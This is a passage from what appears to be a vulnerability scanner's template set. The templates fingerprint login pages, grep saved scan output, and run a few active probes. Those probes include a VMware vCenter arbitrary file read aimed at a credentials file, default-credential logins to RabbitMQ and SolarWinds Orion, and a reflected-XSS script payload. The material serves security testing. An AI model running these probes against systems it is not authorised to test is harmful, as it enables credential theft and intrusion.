2 | VULN_NAME='MobileIron Login 2' 3 | URI='/mifs/login.jsp' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MobileIron_Login_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 3' 3 | URI='/mifs/c/d/android.html' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/PHP_Composer_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PHP Composer Disclosure' 3 | URI='/composer.json' 4 | METHOD='GET' 5 | MATCH='repositories|require-dev' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/PHP_Info.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='PHP Info Detected 1' 3 | URI='/phpinfo.php' 4 | METHOD='GET' 5 | MATCH='>PHP Version \<' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-e' -------------------------------------------------------------------------------- /templates/active/Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Palo Alto GlobalProtect PAN-OS Portal Detected' 3 | URI='/global-protect/login.esp' 4 | METHOD='GET' 5 | MATCH="<title>GlobalProtect" 6 | 
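SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/PulseSecure_VPN_Detected.sh:
--------------------------------------------------------------------------------
# Fingerprints a Pulse Secure VPN login page (informational).
AUTHOR='@xer0dayz'
VULN_NAME='PulseSecure VPN Detected'
URI='/dana-na/auth/url_admin/welcome.cgi'
METHOD='GET'
MATCH='<title>SSL'
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/RabbitMQ_Management_Default_Credentials.sh:
--------------------------------------------------------------------------------
# Reports a RabbitMQ management API that answers /api/whoami for the built-in
# guest account.
AUTHOR='@xer0dayz'
VULN_NAME='RabbitMQ Management Default Credentials'
URI="/api/whoami"
METHOD='GET'
MATCH="{\"name\":\"guest\""
SEVERITY='P2 - HIGH'
# Quoting fix: the value was single-quoted and contained '' for the empty
# user agent, which in shell closes and reopens the string, so --user-agent
# consumed "-s" as its argument and the silent flag was lost. The double-quoted
# form below is the one the SAP and SolarWinds templates use for extra headers.
# NOTE(review): the Authorization value is sent without a scheme token, unlike
# the SolarWinds templates' "Basic <token>" form -- confirm this is intended.
CURL_OPTS="-H 'Content-Type: application/json' -H 'Authorization: Z3Vlc3Q6Z3Vlc3Q=' --user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/RabbitMQ_Management_Interface_Detected.sh:
--------------------------------------------------------------------------------
# Fingerprints the RabbitMQ management UI by its page title (informational).
AUTHOR='@xer0dayz'
VULN_NAME='RabbitMQ Management Interface Detected'
URI='/'
METHOD='GET'
MATCH="<title>RabbitMQ Management"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Robots.txt_Detected.sh:
--------------------------------------------------------------------------------
# Reports the presence of a robots.txt (informational); MATCH continues below.
AUTHOR='@xer0dayz'
VULN_NAME='Robots.txt Detected'
URI='/robots.txt'
METHOD='GET'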
MATCH='Disallow\:|Allow\:|Sitemap\:' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/SAP_NetWeaver_AS_JAVA_LM_Configuration_Wizard_Detection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-6287 - SAP NetWeaver AS JAVA LM Configuration Wizard Detection' 3 | URI='/CTCWebService/CTCWebServiceBean/ConfigServlet' 4 | METHOD='GET' 5 | MATCH="CTCWebServiceSi" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: text/xml; charset=UTF-8' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/SQLiteManager_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SQLiteManager Detected' 3 | URI='/sqlite/' 4 | METHOD='GET' 5 | MATCH='<title>SQLiteManager' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Sitemap.xml_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Sitemap.xml Detected' 3 | URI='/sitemap.xml' 4 | METHOD='GET' 5 | MATCH='<?xml\ ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/SolarWinds_Orion_Default_Credentials_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Default Credentials 1' 3 | 
URI='/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS' 4 | METHOD='GET' 5 | MATCH="totalRow" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /templates/active/SolarWinds_Orion_Default_Credentials_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Default Credentials 2' 3 | URI=':17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROW' 4 | METHOD='GET' 5 | MATCH="totalRow" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /templates/active/SolarWinds_Orion_Panel.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SolarWinds Orion Panel' 3 | URI='/Orion/Login.aspx' 4 | METHOD='GET' 5 | MATCH="SolarWinds\ Orion" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/TeamQuest_Login_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='TeamQuest Login Found' 3 | URI='/teamquest/cgi-bin/login' 4 | METHOD='GET' 5 | MATCH="TeamQuest\ \-\ Login" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 
-------------------------------------------------------------------------------- /templates/active/Telerik_File_Upload_Web_UI.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Telerik File Upload Web UI' 3 | URI='/Telerik.Web.UI.WebResource.axd?type=rau' 4 | METHOD='GET' 5 | MATCH="RadAsyncUpload\ handler\ is\ registered\ succesfully" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Tiki_Wiki_CMS_Groupware_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Tiki Wiki CMS Groupware' 3 | URI='/tiki-login.php' 4 | METHOD='GET' 5 | MATCH="Groupware" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Unauthenticated_Jenkins_Dashboard_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Unauthenticated Jenkins Dashboard Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="\[Jenkins\]" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/VMware_vCenter_Unauthenticated_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='VMware vCenter Unauthenticated Arbitrary File Read' 3 | URI='/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties' 4 | METHOD='GET' 5 | MATCH="dbtype\ |password\.ecrypted" 6 | SEVERITY='P2 - HIGH' 7 | 
CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Weak_Authentication_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Weak Authentication' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='realm\=' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="-I -L --user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | 11 | if [[ "$SSL" == "false" ]]; then 12 | SEVERITY='P2 - HIGH' 13 | fi -------------------------------------------------------------------------------- /templates/active/WebLogic_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='WebLogic Detected' 3 | URI='/console/login/LoginForm.jsp' 4 | METHOD='GET' 5 | MATCH='WebLogic' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Web_Config_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Web Config Detected 1' 3 | URI='/web.config' 4 | METHOD='GET' 5 | MATCH='<configuration>' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="-L --user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Weblogic_Application_Server_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Weblogic Application Server Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Weblogic\ Application\ Server" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | 
GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpres_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 1' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpres_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 2' 3 | URI='/blog/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpres_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Detected 3' 3 | URI='/wordpress/' 4 | METHOD='GET' 5 | MATCH="content\=\"WordPress" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Wordpress_WP-File-Manager_Version_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress WP-File-Manager Version Detected' 3 | URI="/wp-content/plugins/wp-file-manager/readme.txt" 4 | METHOD='GET' 5 | MATCH="Stable\ tag\:" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- 
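/templates/active/XSS.py:
--------------------------------------------------------------------------------
# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
import sys
from seleniumrequests import Firefox

# Reflected-XSS probe: fetch /xss.php with a marker payload and report the
# target as vulnerable if the marker comes back unmodified in the body.
# Usage: XSS.py <base-url>
if len(sys.argv) < 2:
    sys.exit("usage: XSS.py <base-url>")

url = sys.argv[1]
# Simple usage with built-in WebDrivers:
webdriver = Firefox()
try:
    response = webdriver.request('GET', '%s/xss.php?xss=<script>document.write(INJECTX)</script>' % url)
    if '<script>document.write(INJECTX)</script>' in response.text:
        print("Vulnerable!")
        print(response.text)
finally:
    # Always shut the browser down, even when the request raises; otherwise a
    # Firefox process is left behind for every failed run.
    webdriver.quit()
# Kept for parity with the shell templates; a plain assignment in Python.
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/cPanel_Login_Found.sh:
--------------------------------------------------------------------------------
# Fingerprints a cPanel login page on the default port (informational).
AUTHOR='@xer0dayz'
VULN_NAME='cPanel Login Found'
URI='/'
METHOD='GET'
MATCH="cPanel\ Login"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS=''
--------------------------------------------------------------------------------
/templates/active/cPanel_Login_Found_2.sh:
--------------------------------------------------------------------------------
# Same check as cPanel_Login_Found.sh, against port 2083.
AUTHOR='@xer0dayz'
VULN_NAME='cPanel Login Found 2'
URI=':2083/'
METHOD='GET'
MATCH="cPanel\ Login"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS=''
--------------------------------------------------------------------------------
/templates/active/phpMyAdmin_Scanner_1.sh:
--------------------------------------------------------------------------------
# Fingerprints phpMyAdmin by its page title (informational); continues below.
AUTHOR='@xer0dayz'
VULN_NAME='phpMyAdmin Detected'
URI='/phpmyadmin/'
METHOD='GET'
MATCH='<title>phpMyAdmin '
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''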
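GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh:
--------------------------------------------------------------------------------
# Passive: greps the saved ssh_enumusers output for a positive-result marker.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2018-15473 - OpenSSH Username Enumeration'
FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_enumusers.txt"
MATCH="\[+\]"
SEVERITY='P3 - MEDIUM'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
TYPE="network"
--------------------------------------------------------------------------------
/templates/passive/network/Default_Credentials_BruteX.sh:
--------------------------------------------------------------------------------
# Passive: any recovered credential in the brutex output is reported.
AUTHOR='@xer0dayz'
VULN_NAME='Default Credentials - BruteX'
FILENAME="$LOOT_DIR/credentials/brutex-$TARGET.txt $LOOT_DIR/credentials/brutex-$TARGET-*.txt"
MATCH="password\:\ "
SEVERITY='P1 - CRITICAL'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
TYPE="network"
--------------------------------------------------------------------------------
/templates/passive/network/Default_Credentials_NMap.sh:
--------------------------------------------------------------------------------
# Passive: nmap script output reporting valid credentials.
AUTHOR='@xer0dayz'
VULN_NAME='Default Credentials - NMap'
FILENAME="$LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt"
MATCH="Valid\ credentials"
SEVERITY='P1 - CRITICAL'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
TYPE="network"
--------------------------------------------------------------------------------
/templates/passive/network/Interesting_Domain_Found.sh:
--------------------------------------------------------------------------------
# Passive: the target name itself is the text searched for interesting words.
AUTHOR='@xer0dayz'
VULN_NAME='Interesting Domain Found'
# The name is written to a fresh private scratch file instead of the fixed,
# world-writable path /tmp/target: that path was clobbered by every concurrent
# scan and could be pre-created (or symlinked) by another local user before
# the scan wrote to it. The file is created before FILENAME is consumed.
# NOTE(review): the scratch file is not removed here (neither was /tmp/target)
# -- confirm whether the template runner cleans up FILENAME.
FILENAME="$(mktemp)"
echo "$TARGET" > "$FILENAME"
MATCH="admin|dev|portal|stage|prod|tst|test"
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
TYPE='network'
--------------------------------------------------------------------------------
/templates/passive/network/Lack_of_SPF_DNS_Record.sh:
--------------------------------------------------------------------------------
# Passive: the e-mail check output flags domains where spoofing is possible.
AUTHOR='@xer0dayz'
VULN_NAME='Lack of SPF DNS Record'
FILENAME="$LOOT_DIR/nmap/email-$TARGET.txt"
MATCH="\[\+\]\ Spoofing\ possible"
SEVERITY='P4 - LOW'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
TYPE='network'
--------------------------------------------------------------------------------
/templates/passive/network/Possible_Takeover_Detected.sh:
--------------------------------------------------------------------------------
# Passive: provider names in the takeover output that may indicate a dangling
# record. Informational only; several terms (feed, desk, amazon, monitor) are
# broad and will match unrelated lines.
# NOTE(review): instapage, teamwork, helpjuice, helpscout, pingdom, tictail and
# unbounce appear twice (harmless in an alternation), and "netifly" looks like
# a misspelling of netlify -- confirm against the takeover output format.
AUTHOR='@xer0dayz'
VULN_NAME='Possible Takeover Detected'
FILENAME="$LOOT_DIR/nmap/takeovers-$TARGET.txt"
MATCH='anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp|azure|trafficmanager|netifly|brandpa'
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
TYPE='network'
--------------------------------------------------------------------------------
/templates/passive/network/SMB_Info_Disclosure.sh:
--------------------------------------------------------------------------------
# Passive: positive-result marker in the saved SMB module output (139/445).
AUTHOR='@xer0dayz'
VULN_NAME='SMB Info Disclosure'
FILENAME="$LOOT_DIR/output/msf-$TARGET-port139.txt $LOOT_DIR/output/msf-$TARGET-port445.txt"
MATCH="\[\+\]"
SEVERITY='P4 - LOW'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
TYPE="network"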
--------------------------------------------------------------------------------
/templates/passive/network/SMBv1_Enabled.sh:
--------------------------------------------------------------------------------
# Passive network check: a positive grep for "SMBv1" in the nmap output files.
# The fields are read by the template runner, which lives outside this file.
AUTHOR='@xer0dayz'
TYPE='network'
SEVERITY='P3 - MEDIUM'
VULN_NAME='SMBv1 Enabled'
FILENAME="$LOOT_DIR/output/nmap-$TARGET-*.txt"
MATCH='SMBv1'
SEARCH='positive'
GREP_OPTIONS='-i'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/network/SSH_Version_Disclosure.sh:
--------------------------------------------------------------------------------
# Passive network check: "[+]" result lines from the Metasploit ssh_version
# module output.
AUTHOR='@xer0dayz'
TYPE='network'
SEVERITY='P4 - LOW'
VULN_NAME='SSH Version Disclosure'
FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_version.txt"
MATCH='\[\+\]'
SEARCH='positive'
GREP_OPTIONS='-i'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/network/Subjack_Takeover_Detected.sh:
--------------------------------------------------------------------------------
# Passive network check: subjack marks confirmed candidates "[Vulnerable]".
AUTHOR='@xer0dayz'
TYPE='network'
SEVERITY='P2 - HIGH'
VULN_NAME='Subjack Takeover Detected'
FILENAME="$LOOT_DIR/nmap/subjack-$TARGET.txt"
MATCH='\[Vulnerable\]'
SEARCH='positive'
GREP_OPTIONS='-i'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/network/Subover_Takeover_Detected.sh:
--------------------------------------------------------------------------------
# Passive network check: SubOver reports candidates as "Takeover Possible".
AUTHOR='@xer0dayz'
TYPE='network'
SEVERITY='P2 - HIGH'
VULN_NAME='Subover Takeover Detected'
FILENAME="$LOOT_DIR/nmap/subover-$TARGET.txt"
MATCH='Takeover\ Possible'
SEARCH='positive'
GREP_OPTIONS='-i'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
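/templates/passive/network/recursive/Component_With_Known_Vulnerabilities_-_NMap.sh:
--------------------------------------------------------------------------------
# Recursive template: writes its own sc0pe result file instead of leaving the
# grep to the runner.  Every nmap line that references vulners.com becomes one
# P3 finding carrying words 2-4 of that line.
AUTHOR='@xer0dayz'
VULN_NAME='Component With Known Vulnerabilities - NMap'
# Deliberately unquoted where it is used: it is a space-separated list of globs.
FILENAME="$LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt"
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
MATCH="vulners.com"
GREP_OPTIONS='-ih'
TYPE="network"
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

rm -f "$SC0PE_FILE" 2> /dev/null
# grep -E replaces the deprecated egrep alias.  The target comes straight from
# AWK_TARGET rather than the old "$5=AWK_TARGET" field-assignment trick; the
# printed columns are unchanged.
grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
  | awk -v AWK_TARGET="$TARGET" 'AWK_TARGET != "" {
        print "P3 - MEDIUM, Components with Known Vulnerabilities - NMap, " AWK_TARGET ", " $2 " " $3 " " $4
    }' 2> /dev/null >> "$SC0PE_FILE"
cat "$SC0PE_FILE" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/network/recursive/Interesting_Ports_Found.sh:
--------------------------------------------------------------------------------
# Recursive template: reports the first open port from ports-$TARGET.txt that
# is in the list below, or removes a stale result file when none matches.
AUTHOR='@xer0dayz'
VULN_NAME='Interesting Ports Found'
FILENAME="$LOOT_DIR/nmap/ports-$TARGET.txt"
# Each alternative ends in an escaped space so "22 " matches the port column as
# written in the file.  NOTE(review): "21\ " also matches inside "8021 ".
MATCH="21\ |22\ |23\ |137\ |139\ |445\ |8080\ |8443\ |3306\ |5900\ |53\ |8081\ |5432\ "
SEVERITY='P5 - INFO'
GREP_OPTIONS='-i'
SECONDARY_COMMANDS=''
OUTPUT_NAME=$(echo "$VULN_NAME" | sed -E 's/[^[:alnum:]]+/_/g')
TYPE='network'
SC0PE_FILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"

# Private scratch file instead of the fixed /tmp/match.out: a predictable
# world-writable path can be pre-created or symlinked by another local user,
# and concurrent scans overwrote each other's evidence.
MATCH_OUT="$(mktemp -t sniper-match.XXXXXX)"

# $GREP_OPTIONS and $SECONDARY_COMMANDS stay unquoted on purpose so they split
# into separate arguments (or vanish when empty).
cat $FILENAME 2> /dev/null \
  | grep -E $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null \
  | head -n 1 > "$MATCH_OUT" 2> /dev/null

# Byte count of the first match.  Numeric -gt replaces the original
# "[[ $CHARS > 0 ]]", which is a lexical string comparison inside [[ ]].
CHARS="$(wc -c < "$MATCH_OUT" 2> /dev/null)"
if [ "${CHARS:-0}" -gt 0 ]; then
  echo "$SEVERITY, $VULN_NAME, $TARGET, $(cat "$MATCH_OUT" 2> /dev/null)" | tee "$SC0PE_FILE" 2> /dev/null
  # /bin/bash "$INSTALL_DIR/bin/slack.sh" "[+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat "$MATCH_OUT" | tr '\n' ' ') (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
  #echo "•?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat "$MATCH_OUT") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
else
  # No match: make sure a finding from an earlier run does not survive.
  rm -f "$SC0PE_FILE" 2> /dev/null
fi

rm -f "$MATCH_OUT" 2> /dev/null
--------------------------------------------------------------------------------
/templates/passive/web/Autocomplete_Enabled.sh:
--------------------------------------------------------------------------------
# Passive web check over the saved page sources (both schemes, all ports).
AUTHOR='@xer0dayz'
VULN_NAME='Autocomplete Enabled'
FILENAME="$LOOT_DIR/web/websource-htt*-$TARGET-*.txt"
MATCH='autocomplete=\"on\"'
SEVERITY='P4 - LOW'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/CORS_Policy_-_Allow-Credentials_Enabled.sh:
--------------------------------------------------------------------------------
# Passive web check over the saved response headers.
AUTHOR='@xer0dayz'
VULN_NAME='CORS Policy - Allow-Credentials Enabled'
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
MATCH='Access-Control-Allow-Credentials: true'
SEVERITY='P4 - LOW'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/CORS_Policy_-_Allow-Origin_Wildcard.sh:
--------------------------------------------------------------------------------
# Passive web check over the saved response headers.
AUTHOR='@xer0dayz'
VULN_NAME='CORS Policy - Allow-Origin Wildcard'
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
# The asterisk must be escaped: as an extended regex, ": *" means "colon then
# any number of spaces" and flagged every Access-Control-Allow-Origin header,
# not only the wildcard one.
MATCH='Access-Control-Allow-Origin: \*'
SEVERITY='P4 - LOW'
GREP_OPTIONS='-i'
SEARCH='positive'
SECONDARY_COMMANDS=''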
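--------------------------------------------------------------------------------
/templates/passive/web/CSP_Not_Enforced.sh:
--------------------------------------------------------------------------------
# Negative check: a finding is raised when no Content-Security-Policy header
# appears in the captured response headers.  The headers file is chosen by the
# scheme the scan ran with ($SSL) and the check is only armed when that file
# exists; the original tested for the http capture even when it went on to use
# the https one.
if [ "$SSL" = "true" ]; then
  SC0PE_HEADERS="$LOOT_DIR/web/headers-https-$TARGET.txt"
else
  SC0PE_HEADERS="$LOOT_DIR/web/headers-http-$TARGET.txt"
fi
if [ -f "$SC0PE_HEADERS" ]; then
  AUTHOR='@xer0dayz'
  VULN_NAME='CSP Not Enforced'
  FILENAME="$SC0PE_HEADERS"
  MATCH="content-security-policy"
  SEVERITY='P5 - INFO'
  GREP_OPTIONS='-i'
  SEARCH='negative'
  SECONDARY_COMMANDS=''
  URI=""
fi
--------------------------------------------------------------------------------
/templates/passive/web/Clear-text_Communications_HTTP.sh:
--------------------------------------------------------------------------------
# Only meaningful for plain-HTTP scans; nothing is set otherwise.
if [ "$SSL" = "false" ]; then
  AUTHOR='@xer0dayz'
  VULN_NAME='Clear-Text Protocol - HTTP'
  FILENAME="$LOOT_DIR/web/headers-http-$TARGET-*.txt"
  MATCH="200\ OK"
  SEVERITY='P2 - HIGH'
  GREP_OPTIONS='-i'
  SEARCH='positive'
  SECONDARY_COMMANDS=''
fi
--------------------------------------------------------------------------------
/templates/passive/web/Clickjacking.sh:
--------------------------------------------------------------------------------
# Negative check for X-Frame-Options.  Same structure as CSP_Not_Enforced.sh:
# the headers file and the finding name follow $SSL, and the check is armed
# only when that file exists.
if [ "$SSL" = "false" ]; then
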